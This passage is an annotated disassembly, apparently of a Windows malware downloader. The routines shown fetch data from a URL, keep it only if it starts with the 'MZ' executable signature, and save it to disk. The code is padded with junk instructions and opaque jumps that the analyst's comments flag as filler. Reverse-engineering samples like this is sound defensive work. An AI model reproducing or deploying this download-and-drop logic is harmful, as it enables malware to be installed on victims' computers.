mov ecx, dword ptr [ebp-3C]
push ecx
call L1321
add esp, 4
jmp L1082
L1071:
; advance the write pointer and the running total by the bytes returned
mov edx, dword ptr [ebp-2C]
add edx, dword ptr [ebp-30]
mov dword ptr [ebp-2C], edx
mov eax, dword ptr [ebp-1C]
add eax, dword ptr [ebp-30]
mov dword ptr [ebp-1C], eax
jmp L1011
L1078:
; done: record the byte count in the object, result = 1
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ebp-1C]
mov dword ptr [ecx+104], edx
mov dword ptr [ebp-20], 1
L1082:
; leave the try block and run the cleanup block once
mov dword ptr [ebp-4], -1
call L1085
jmp L1112
L1085:
; cleanup block: close the session and URL handles when non-zero. The two
; fields are not cleared afterwards, so L763 later sees the same values.
; filler: ebx saved and restored
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
mov eax, dword ptr [ebp-40]
cmp dword ptr [eax+108], 0
je L1097
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ecx+108]
push edx
call InternetCloseHandle
L1097:
mov eax, dword ptr [ebp-40]
cmp dword ptr [eax+10C], 0
je L1104
mov ecx, dword ptr [ebp-40]
mov edx, dword ptr [ecx+10C]
push edx
call InternetCloseHandle
L1104:
; je/jnz pair: always jumps to L1111; the lines up to L1111 are stray bytes
je L1111
jnz L1111
and ah, byte ptr [ebx]
db 25
db 47
db 35
push edi
L1111:
retn
L1112:
; return the result and unlink the exception frame
mov eax, dword ptr [ebp-20]
mov ecx, dword ptr [ebp-10]
mov dword ptr fs:[0], ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 8
; padding between functions
int3
int3
int3
int3
int3
int3
; ---------------------------------------------------------------------------
; L1127 -- writes the downloaded buffer to the object's path.
; In:  ecx = object (its first bytes are the file path),
;      [ebp+8] = data buffer (callee pops it, `retn 4`)
; Out: eax = 1 if WriteFile succeeded and wrote exactly [object+104] bytes,
;      else 0
; Uses an _except_handler3 frame; L1203 is the cleanup block that closes the
; file handle.
; ---------------------------------------------------------------------------
L1127:
push ebp
mov ebp, esp
push -1
push 004020E0
push <jmp.&MSVCRT._except_handler3>
mov eax, dword ptr fs:[0]
push eax
mov dword ptr fs:[0], esp
add esp, -18
push ebx
push esi
push edi
; [ebp-28] = object pointer
mov dword ptr [ebp-28], ecx
; jb/jnb pair: always jumps to L1148; the lines up to L1148 are stray bytes
jb L1148
jnb L1148
add dl, byte ptr [ebx+15]
aaa
db 15
db 37
db 15
aaa
L1148:
; CreateFileA(path, 40000000 GENERIC_WRITE, 1 FILE_SHARE_READ, NULL,
;             2 CREATE_ALWAYS, 80 FILE_ATTRIBUTE_NORMAL, NULL):
; an existing file of the same name is replaced
push 0
push 80
push 2
push 0
push 1
push 40000000
mov eax, dword ptr [ebp-28]
push eax
call CreateFileA
mov dword ptr [ebp-20], eax
; -1 = INVALID_HANDLE_VALUE: return 0
cmp dword ptr [ebp-20], -1
jnz L1162
xor eax, eax
jmp L1213
L1162:
; [ebp-1C] = result = 0
mov dword ptr [ebp-1C], 0
; NOTE(review): the single-byte `wait` here and at L1199 looks like filler
; -- confirm against the raw bytes
wait
; try level 0
mov dword ptr [ebp-4], 0
; WriteFile(handle, data, [object+104], &written, NULL)
push 0
lea ecx, dword ptr [ebp-24]
push ecx
mov edx, dword ptr [ebp-28]
mov eax, dword ptr [edx+104]
push eax
mov ecx, dword ptr [ebp+8]
push ecx
mov edx, dword ptr [ebp-20]
push edx
call WriteFile
test eax, eax
jnz L1179
jmp L1199
L1179:
; filler: all four registers saved and restored
push eax
push ebx
push ecx
push edx
mov eax, E0FF0000
mov ebx, 10FFEEEE
sub eax, ebx
inc eax
inc ecx
inc edx
pop edx
pop ecx
pop ebx
pop eax
; success only when the written count equals the requested count
mov eax, dword ptr [ebp-28]
mov ecx, dword ptr [eax+104]
cmp ecx, dword ptr [ebp-24]
je L1198
jmp L1199
L1198:
mov dword ptr [ebp-1C], 1
L1199:
wait
; leave the try block and run the cleanup block once
mov dword ptr [ebp-4], -1
call L1203
jmp L1207
L1203:
; cleanup block: close the file handle
mov edx, dword ptr [ebp-20]
push edx
call CloseHandle
retn
L1207:
; filler: ebx saved and restored
push ebx
mov ebx, 2
inc ebx
dec ebx
pop ebx
mov eax, dword ptr [ebp-1C]
L1213:
; unlink the exception frame and return
mov ecx, dword ptr [ebp-10]
mov dword ptr fs:[0], ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn 4
; ---------------------------------------------------------------------------
; L1221 -- download, check, save.
; In:  ecx = object, [ebp+8] = URL string (callee pops it, `retn 4`)
; Out: eax = 1 if the download succeeded, the data starts with the 16-bit
;      value 5A4D (the "MZ" signature of a Windows executable) and L1127
;      wrote it to disk; otherwise 0
; The buffer returned by L898 is freed here in every case where L898
; reported success.
; ---------------------------------------------------------------------------
L1221:
push ebp
mov ebp, esp
push ecx
push esi
; esi = object; [ebp-4] = buffer pointer, initially 0; edi = result, 0
mov esi, ecx
mov ecx, dword ptr [ebp+8]
lea eax, dword ptr [ebp-4]
push edi
push eax
xor edi, edi
push ecx
mov ecx, esi
mov dword ptr [ebp-4], edi
; L898(object, url, &buffer)
call L898
test eax, eax
jnz L1242
; download failed: return with eax = 0
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
L1242:
; filler: ecx saved and restored
push ecx
inc ecx
pop ecx
; only content that begins with "MZ" is written to disk
mov eax, dword ptr [ebp-4]
cmp word ptr [eax], 5A4D
jnz L1254
push eax
mov ecx, esi
call L1127
test eax, eax
je L1254
mov edi, 1
L1254:
; free the download buffer (L1321 = operator delete) and return the result
mov edx, dword ptr [ebp-4]
push edx
call L1321
add esp, 4
mov eax, edi
pop edi
pop esi
mov esp, ebp
pop ebp
retn 4
; padding between functions
nop
nop
nop
nop
; ---------------------------------------------------------------------------
; L1268 -- one fetch attempt.
; In:  ecx = object, [ebp+8] = URL string, [ebp+C] = proxy name or 0
;      (callee pops both, `retn 8`)
; Out: eax = 0 if the session could not be opened (L789), otherwise the
;      result of L1221
; ---------------------------------------------------------------------------
L1268:
push ebp
mov ebp, esp
push esi
mov esi, ecx
; filler calls (atoi, ceil, div, isalnum, isalpha on constants); their
; 1C bytes of arguments are removed by the single `add esp, 1C` below
push 0040311C
call atoi
push 0
push 0
call ceil
push 1
push 1
fstp st
call div
push 1
call isalnum
push 1
call isalpha
mov eax, dword ptr [ebp+C]
add esp, 1C
; L789(object, proxy)
mov ecx, esi
push eax
call L789
test eax, eax
jnz L1295
pop esi
pop ebp
retn 8
L1295:
; filler: ecx saved and restored
push ecx
inc ecx
pop ecx
; L1221(object, url)
mov ecx, dword ptr [ebp+8]
push ecx
mov ecx, esi
call L1221
pop esi
pop ebp
retn 8
; padding between functions
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
nop
; Import thunks: one-instruction jumps into the C runtime.
; The first one has no label in this dump; it is the target written as
; <jmp.&MSVCRT._except_handler3> in the exception-frame prologues.
jmp _except_handler3
; L1321 = operator delete, L1322 = operator new (used by L898 and L1221)
L1321:
jmp operator delete
L1322:
jmp operator new
; ---------------------------------------------------------------------------
; Program entry code (no label in this dump). It only calls C runtime
; initialisation functions, prepares the arguments and calls L000, then
; passes L000's return value to exit. It looks like the startup stub a
; compiler links in rather than code specific to this sample.
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push -1
push 004020F0
push <jmp.&MSVCRT._except_handler3>
mov eax, dword ptr fs:[0]
push eax
mov dword ptr fs:[0], esp
sub esp, 68
push ebx
push esi
push edi
mov dword ptr [ebp-18], esp
; ebx = 0 for the rest of the stub; try level 0
xor ebx, ebx
mov dword ptr [ebp-4], ebx
; __set_app_type(2): the runtime's value for a GUI (windowed) program
push 2
call __set_app_type
pop ecx
or dword ptr [403274], FFFFFFFF
or dword ptr [403278], FFFFFFFF
; copy two stored settings into the runtime's file-mode and commit-mode
; variables
call __p__fmode
mov ecx, dword ptr [403270]
mov dword ptr [eax], ecx
call __p__commode
mov ecx, dword ptr [40326C]
mov dword ptr [eax], ecx
; the dump dropped the destination operand on the next line; the following
; `mov eax, dword ptr [eax]` suggests it loads the address of _adjust_fdiv
; into eax
mov _adjust_fdiv
mov eax, dword ptr [eax]
mov dword ptr [40327C], eax
call L1452
cmp dword ptr [403260], ebx
jnz L1358
push 00401FDE
call __setusermatherr
pop ecx
L1358:
; floating-point control setup (L1444), then two _initterm passes (L1443)
; around __getmainargs
call L1444
push 0040300C
push 00403008
call L1443
mov eax, dword ptr [403268]
mov dword ptr [ebp-6C], eax
lea eax, dword ptr [ebp-6C]
push eax
push dword ptr [403264]
lea eax, dword ptr [ebp-64]
push eax
lea eax, dword ptr [ebp-70]
push eax
lea eax, dword ptr [ebp-60]
push eax
call __getmainargs
push 00403004
push 00403000
call L1443
add esp, 24
; operand dropped by the dump again; the next line reads through eax, so
; this presumably loads the address of _acmdln (the raw command line)
mov _acmdln
mov esi, dword ptr [eax]
mov dword ptr [ebp-74], esi
; skip the program name at the start of the command line: if it begins with
; a quote (22), scan to the closing quote; otherwise (L1407) scan to the
; first byte <= 20 (space or control character)
cmp byte ptr [esi], 22
jnz L1407
L1383:
inc esi
mov dword ptr [ebp-74], esi
mov al, byte ptr [esi]
cmp al, bl
je L1390
cmp al, 22
jnz L1383
L1390:
cmp byte ptr [esi], 22
jnz L1394
L1392:
inc esi
mov dword ptr [ebp-74], esi
L1394:
; skip bytes <= 20 between the program name and the first argument
mov al, byte ptr [esi]
cmp al, bl
je L1399
cmp al, 20
jbe L1392
L1399:
; GetStartupInfoA into [ebp-5C]; [ebp-30] is its flags field, pre-cleared.
; If flag bit 1 (STARTF_USESHOWWINDOW) is set, the show command is the
; 16-bit field at [ebp-2C], otherwise the constant 0A.
mov dword ptr [ebp-30], ebx
lea eax, dword ptr [ebp-5C]
push eax
call GetStartupInfoA
test byte ptr [ebp-30], 1
je L1412
movzx eax, word ptr [ebp-2C]
jmp L1414
L1407:
cmp byte ptr [esi], 20
jbe L1394
inc esi
mov dword ptr [ebp-74], esi
jmp L1407
L1412:
push 0A
pop eax
L1414:
; L000(GetModuleHandleA(NULL), 0, remaining command line, show command),
; then exit(return value)
push eax
push esi
push ebx
push ebx
call GetModuleHandleA
push eax
call L000
mov dword ptr [ebp-68], eax
push eax
call exit
; exception filter of the startup frame: pass the exception code and the
; exception pointers to _XcptFilter (L1442)
mov eax, dword ptr [ebp-14]
mov ecx, dword ptr [eax]
mov ecx, dword ptr [ecx]
mov dword ptr [ebp-78], ecx
push eax
push ecx
call L1442
pop ecx
pop ecx
retn
; the disassembler lost sync on the lines below: the bytes
; 8B 65 E8 / FF 75 88 / FF 15 <&MSVCRT._exit> appear to decode as
; `mov esp, dword ptr [ebp-18]` / `push dword ptr [ebp-78]` /
; `call dword ptr [<&MSVCRT._exit>]`, i.e. the handler body calling _exit
; with the exception code
db 8B
db 65
db E8
db FF
db 75
mov bh, bh
db 15
dd <&MSVCRT._exit>
; Runtime thunks and small helpers used only by the startup code above.
L1442:
jmp _XcptFilter
L1443:
jmp _initterm
L1444:
; _controlfp(10000, 30000): the mask 30000 selects the precision-control
; bits; the caller cleans the two arguments with the pops
push 30000
push 10000
call L1453
pop ecx
pop ecx
retn
; unlabelled two-instruction routine that returns 0.
; NOTE(review): presumably the handler at 00401FDE passed to
; __setusermatherr -- confirm against the addresses in the debugger
xor eax, eax
retn
L1452:
; empty routine called once from the startup code
retn
L1453:
jmp _controlfp
; padding to the end of the code section
int3
int3
int3
int3
int3
int3
int3
int3
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00
db 00